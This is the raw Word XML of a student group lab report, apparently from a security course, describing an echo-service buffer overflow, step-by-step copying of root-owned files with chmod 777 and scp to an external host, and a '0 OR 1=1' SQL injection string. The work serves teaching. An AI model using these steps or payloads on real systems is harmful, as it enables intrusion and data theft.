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1AA316" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12EF5E8F" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040B4615" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8C3499" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00CAA86E" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79AC2513" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C17550B" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Project #2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06267837" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Tyler Perkins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDE9B11" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Christopher Ward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EFA0C9" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Matt Stanfield</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF80F0B" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pierre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bonnain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4065F289" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22164DEF" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Section I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB88D56" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>The firewall setup portion of task 1 was completed by Tyler, the rest of task 1 was completed by everyone. Task 2 was completed by Chris and Matt. Task 3A was completed primarily by Chris with help from the rest of the group. Task 3B was completed by Tyler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Pierre. Task 4 was completed by Tyler. For the report, the introduction was written by Tyler, section 2 was written by Tyler, section 3 was Chris and Tyler, and section 4 was by Matt and Pierre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F12E8F8" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73804BEE" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Section II</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDE180" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>a)Ability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> to Read files in /root/files (Not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>able)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF09EAE" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3A57755C" wp14:editId="483E2622">
            <wp:extent cx="5943600" cy="9906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990600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D042F03" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">b) Bytes Need to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Crash :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 17 Bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C499A" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1349CCC8" wp14:editId="1141D3C0">
            <wp:extent cx="5334000" cy="360997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334000" cy="3609975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F065AC" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25795153" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A31AED3" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0CAE0B" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447DAA39" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F81876" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FCF32D7" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ADE695A" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>c) User ID running Echo Service on B.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C764A" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="25651DFB" wp14:editId="333BE69F">
            <wp:extent cx="5943600" cy="20955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43600" cy="2095500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED2D17F" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>d) User ID running SSH on B.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BBBC17" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1C0B43B2" wp14:editId="7730C6A6">
            <wp:extent cx="5857875" cy="35052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857875" cy="3505200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="052BBF16" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A4E64B6" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C7AA363" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DADDCF" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="227C4E07" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CA37E4" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09CED509" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ECF7E61" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59302D59" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28488E91" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02922559" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAF848D" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Section III</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577CD80F" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Echo Service Exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B79A930" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2541B6FB" wp14:editId="65158B94">
            <wp:extent cx="5152936" cy="365283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152936" cy="3652838"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="355C8C4D" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>b) Exploiting Packet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0698A927" wp14:editId="299DDE5D">
            <wp:extent cx="6245876" cy="1995488"/>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6245876" cy="1995488"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7F352C" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D27B299" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FB7AB7" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>c) Steps to Retrieve Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F7DDE" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run the echo service on the internal server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ACA11D" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit Internal Server using the attack program as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EADABD9" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Allocate 24 bytes to overflow buffer (8 for buffer + 16 for distance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A6ADA0" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start incrementing by 0x10 or 16 in decimal starting at (char*) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005FAE78" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>When connectio</w:t>
      </w:r>
      <w:r>
        <w:t>n stays open, the attack is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B4CED0" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406EFB9F" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Change Directory into the /root/files directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB7E6F0" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36237FC5" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Copy the files from the directory onto the desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE988B4" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cp file1 /Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2E1697" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cp file2 /Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F257758" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Change the permissions of the files to give access to others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6058A9" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cd /Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A364899" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file1 777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8C0381" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file2 777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796F313E" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create a files directory on Desktop and move files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C11F5E" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DD3F20" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>mv file1 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB90A3" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>mv file2 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567860CE" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command to send the files from Internal Serv</w:t>
      </w:r>
      <w:r>
        <w:t>er to the External Computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6326A364" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -r /home/User09/Desktop/files User09@173.20.100.4:/home/User09/Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C571B07" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>d)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">We didn’t happen to take a screen shot but File1’s contents </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>abcde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14B4C45F" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">e) Injected SQL Statement: </w:t>
      </w:r>
      <w:r>
        <w:t>0 OR 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE2868" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>f)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="28685B2C" wp14:editId="467E621A">
            <wp:extent cx="5358587" cy="3252788"/>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358587" cy="3252788"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C10AF3" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16CDFF25" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C1F35F" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A287E8" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0444CDFD" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9F1C4E" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190DBB6C" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDBE4F8" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00465809">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14EBC38E" w14:textId="77777777" w:rsidR="00465809" w:rsidRDefault="00450A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
